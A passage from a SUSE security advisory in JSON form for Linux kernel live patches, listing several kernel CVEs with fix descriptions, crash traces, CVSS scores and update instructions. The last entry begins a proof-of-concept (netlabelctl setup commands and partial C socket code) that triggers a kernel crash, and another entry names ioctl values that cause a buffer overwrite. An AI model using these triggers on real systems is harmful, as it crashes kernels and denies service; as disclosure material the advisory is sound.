[inline]\n show_stack+0x18/0x40 arch/arm64/kernel/stacktrace.c:163\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x68/0x84 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:284 [inline]\n print_report+0x1a8/0x4a0 mm/kasan/report.c:395\n kasan_report+0x94/0xb4 mm/kasan/report.c:495\n __do_kernel_fault+0x164/0x1e0 arch/arm64/mm/fault.c:320\n do_bad_area arch/arm64/mm/fault.c:473 [inline]\n do_tag_check_fault+0x78/0x8c arch/arm64/mm/fault.c:749\n do_mem_abort+0x44/0x94 arch/arm64/mm/fault.c:825\n el1_abort+0x40/0x60 arch/arm64/kernel/entry-common.c:367\n el1h_64_sync_handler+0xd8/0xe4 arch/arm64/kernel/entry-common.c:427\n el1h_64_sync+0x64/0x68 arch/arm64/kernel/entry.S:576\n hlist_add_head include/linux/list.h:929 [inline]\n enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\n mod_timer+0x14/0x20 kernel/time/timer.c:1161\n mrp_periodic_timer_arm net/802/mrp.c:614 [inline]\n mrp_periodic_timer+0xa0/0xc0 net/802/mrp.c:627\n call_timer_fn.constprop.0+0x24/0x80 kernel/time/timer.c:1474\n 
expire_timers+0x98/0xc4 kernel/time/timer.c:1519\n\nTo fix it, we can introduce a new active flags to make sure the timer will\nnot restart.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50697",
"url": "https://www.suse.com/security/cve/CVE-2022-50697"
},
{
"category": "external",
"summary": "SUSE Bug 1255594 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255594"
},
{
"category": "external",
"summary": "SUSE Bug 1255595 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255595"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2022-50697"
},
{
"cve": "CVE-2022-50756",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50756"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-pci: fix mempool alloc size\n\nConvert the max size to bytes to match the units of the divisor that\ncalculates the worst-case number of PRP entries.\n\nThe result is used to determine how many PRP Lists are required. The\ncode was previously rounding this to 1 list, but we can require 2 in the\nworst case. In that scenario, the driver would corrupt memory beyond the\nsize provided by the mempool.\n\nWhile unlikely to occur (you\u0027d need a 4MB in exactly 127 phys segments\non a queue that doesn\u0027t support SGLs), this memory corruption has been\nobserved by kfence.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50756",
"url": "https://www.suse.com/security/cve/CVE-2022-50756"
},
{
"category": "external",
"summary": "SUSE Bug 1256216 for CVE-2022-50756",
"url": "https://bugzilla.suse.com/1256216"
},
{
"category": "external",
"summary": "SUSE Bug 1256217 for CVE-2022-50756",
"url": "https://bugzilla.suse.com/1256217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2022-50756"
},
{
"cve": "CVE-2023-53781",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53781"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc: Fix use-after-free in tcp_write_timer_handler().\n\nWith Eric\u0027s ref tracker, syzbot finally found a repro for\nuse-after-free in tcp_write_timer_handler() by kernel TCP\nsockets. [0]\n\nIf SMC creates a kernel socket in __smc_create(), the kernel\nsocket is supposed to be freed in smc_clcsock_release() by\ncalling sock_release() when we close() the parent SMC socket.\n\nHowever, at the end of smc_clcsock_release(), the kernel\nsocket\u0027s sk_state might not be TCP_CLOSE. This means that\nwe have not called inet_csk_destroy_sock() in __tcp_close()\nand have not stopped the TCP timers.\n\nThe kernel socket\u0027s TCP timers can be fired later, so we\nneed to hold a refcnt for net as we do for MPTCP subflows\nin mptcp_subflow_create_socket().\n\n[0]:\nleaked reference.\n sk_alloc (./include/net/net_namespace.h:335 net/core/sock.c:2108)\n inet_create (net/ipv4/af_inet.c:319 net/ipv4/af_inet.c:244)\n __sock_create (net/socket.c:1546)\n smc_create (net/smc/af_smc.c:3269 net/smc/af_smc.c:3284)\n __sock_create (net/socket.c:1546)\n __sys_socket (net/socket.c:1634 net/socket.c:1618 net/socket.c:1661)\n __x64_sys_socket (net/socket.c:1672)\n do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120)\n==================================================================\nBUG: KASAN: slab-use-after-free in tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\nRead of size 1 at addr ffff888052b65e0d by task syzrepro/18091\n\nCPU: 0 PID: 18091 Comm: syzrepro Tainted: G W 6.3.0-rc4-01174-gb5d54eb5899a #7\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.amzn2022.0.1 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl (lib/dump_stack.c:107)\n print_report (mm/kasan/report.c:320 mm/kasan/report.c:430)\n kasan_report (mm/kasan/report.c:538)\n 
tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\n tcp_write_timer (./include/linux/spinlock.h:390 net/ipv4/tcp_timer.c:643)\n call_timer_fn (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/timer.h:127 kernel/time/timer.c:1701)\n __run_timers.part.0 (kernel/time/timer.c:1752 kernel/time/timer.c:2022)\n run_timer_softirq (kernel/time/timer.c:2037)\n __do_softirq (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/irq.h:142 kernel/softirq.c:572)\n __irq_exit_rcu (kernel/softirq.c:445 kernel/softirq.c:650)\n irq_exit_rcu (kernel/softirq.c:664)\n sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1107 (discriminator 14))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53781",
"url": "https://www.suse.com/security/cve/CVE-2023-53781"
},
{
"category": "external",
"summary": "SUSE Bug 1254751 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254751"
},
{
"category": "external",
"summary": "SUSE Bug 1254755 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2023-53781"
},
{
"cve": "CVE-2025-21738",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21738"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-sff: Ensure that we cannot write outside the allocated buffer\n\nreveliofuzzing reported that a SCSI_IOCTL_SEND_COMMAND ioctl with out_len\nset to 0xd42, SCSI command set to ATA_16 PASS-THROUGH, ATA command set to\nATA_NOP, and protocol set to ATA_PROT_PIO, can cause ata_pio_sector() to\nwrite outside the allocated buffer, overwriting random memory.\n\nWhile a ATA device is supposed to abort a ATA_NOP command, there does seem\nto be a bug either in libata-sff or QEMU, where either this status is not\nset, or the status is cleared before read by ata_sff_hsm_move().\nAnyway, that is most likely a separate bug.\n\nLooking at __atapi_pio_bytes(), it already has a safety check to ensure\nthat __atapi_pio_bytes() cannot write outside the allocated buffer.\n\nAdd a similar check to ata_pio_sector(), such that also ata_pio_sector()\ncannot write outside the allocated buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21738",
"url": "https://www.suse.com/security/cve/CVE-2025-21738"
},
{
"category": "external",
"summary": "SUSE Bug 1238917 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "external",
"summary": "SUSE Bug 1257118 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1257118"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2025-21738"
},
{
"cve": "CVE-2025-38488",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38488"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix use-after-free in crypt_message when using async crypto\n\nThe CVE-2024-50047 fix removed asynchronous crypto handling from\ncrypt_message(), assuming all crypto operations are synchronous.\nHowever, when hardware crypto accelerators are used, this can cause\nuse-after-free crashes:\n\n crypt_message()\n // Allocate the creq buffer containing the req\n creq = smb2_get_aead_req(..., \u0026req);\n\n // Async encryption returns -EINPROGRESS immediately\n rc = enc ? crypto_aead_encrypt(req) : crypto_aead_decrypt(req);\n\n // Free creq while async operation is still in progress\n kvfree_sensitive(creq, ...);\n\nHardware crypto modules often implement async AEAD operations for\nperformance. When crypto_aead_encrypt/decrypt() returns -EINPROGRESS,\nthe operation completes asynchronously. Without crypto_wait_req(),\nthe function immediately frees the request buffer, leading to crashes\nwhen the driver later accesses the freed memory.\n\nThis results in a use-after-free condition when the hardware crypto\ndriver later accesses the freed request structure, leading to kernel\ncrashes with NULL pointer dereferences.\n\nThe issue occurs because crypto_alloc_aead() with mask=0 doesn\u0027t\nguarantee synchronous operation. Even without CRYPTO_ALG_ASYNC in\nthe mask, async implementations can be selected.\n\nFix by restoring the async crypto handling:\n- DECLARE_CRYPTO_WAIT(wait) for completion tracking\n- aead_request_set_callback() for async completion notification\n- crypto_wait_req() to wait for operation completion\n\nThis ensures the request buffer isn\u0027t freed until the crypto operation\ncompletes, whether synchronous or asynchronous, while preserving the\nCVE-2024-50047 fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38488",
"url": "https://www.suse.com/security/cve/CVE-2025-38488"
},
{
"category": "external",
"summary": "SUSE Bug 1247239 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247239"
},
{
"category": "external",
"summary": "SUSE Bug 1247240 for CVE-2025-38488",
"url": "https://bugzilla.suse.com/1247240"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2025-38488"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n 
entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipvs: fix ipv4 null-ptr-deref in route error path\n\nThe IPv4 code path in __ip_vs_get_out_rt() calls dst_link_failure()\nwithout ensuring skb-\u003edev is set, leading to a NULL pointer dereference\nin fib_compute_spec_dst() when ipv4_link_failure() attempts to send\nICMP destination unreachable messages.\n\nThe issue emerged after commit ed0de45a1008 (\"ipv4: recompile ip options\nin ipv4_link_failure\") started calling __ip_options_compile() from\nipv4_link_failure(). This code path eventually calls fib_compute_spec_dst()\nwhich dereferences skb-\u003edev. An attempt was made to fix the NULL skb-\u003edev\ndereference in commit 0113d9c9d1cc (\"ipv4: fix null-deref in\nipv4_link_failure\"), but it only addressed the immediate dev_net(skb-\u003edev)\ndereference by using a fallback device. The fix was incomplete because\nfib_compute_spec_dst() later in the call chain still accesses skb-\u003edev\ndirectly, which remains NULL when IPVS calls dst_link_failure().\n\nThe crash occurs when:\n1. IPVS processes a packet in NAT mode with a misconfigured destination\n2. Route lookup fails in __ip_vs_get_out_rt() before establishing a route\n3. The error path calls dst_link_failure(skb) with skb-\u003edev == NULL\n4. ipv4_link_failure() -\u003e ipv4_send_dest_unreach() -\u003e\n __ip_options_compile() -\u003e fib_compute_spec_dst()\n5. 
fib_compute_spec_dst() dereferences NULL skb-\u003edev\n\nApply the same fix used for IPv6 in commit 326bf17ea5d4 (\"ipvs: fix\nipv6 route unreach panic\"): set skb-\u003edev from skb_dst(skb)-\u003edev before\ncalling dst_link_failure().\n\nKASAN: null-ptr-deref in range [0x0000000000000328-0x000000000000032f]\nCPU: 1 PID: 12732 Comm: syz.1.3469 Not tainted 6.6.114 #2\nRIP: 0010:__in_dev_get_rcu include/linux/inetdevice.h:233\nRIP: 0010:fib_compute_spec_dst+0x17a/0x9f0 net/ipv4/fib_frontend.c:285\nCall Trace:\n \u003cTASK\u003e\n spec_dst_fill net/ipv4/ip_options.c:232\n spec_dst_fill net/ipv4/ip_options.c:229\n __ip_options_compile+0x13a1/0x17d0 net/ipv4/ip_options.c:330\n ipv4_send_dest_unreach net/ipv4/route.c:1252\n ipv4_link_failure+0x702/0xb80 net/ipv4/route.c:1265\n dst_link_failure include/net/dst.h:437\n __ip_vs_get_out_rt+0x15fd/0x19e0 net/netfilter/ipvs/ip_vs_xmit.c:412\n ip_vs_nat_xmit+0x1d8/0xc80 net/netfilter/ipvs/ip_vs_xmit.c:764",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_255-default-14-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T17:03:58Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup 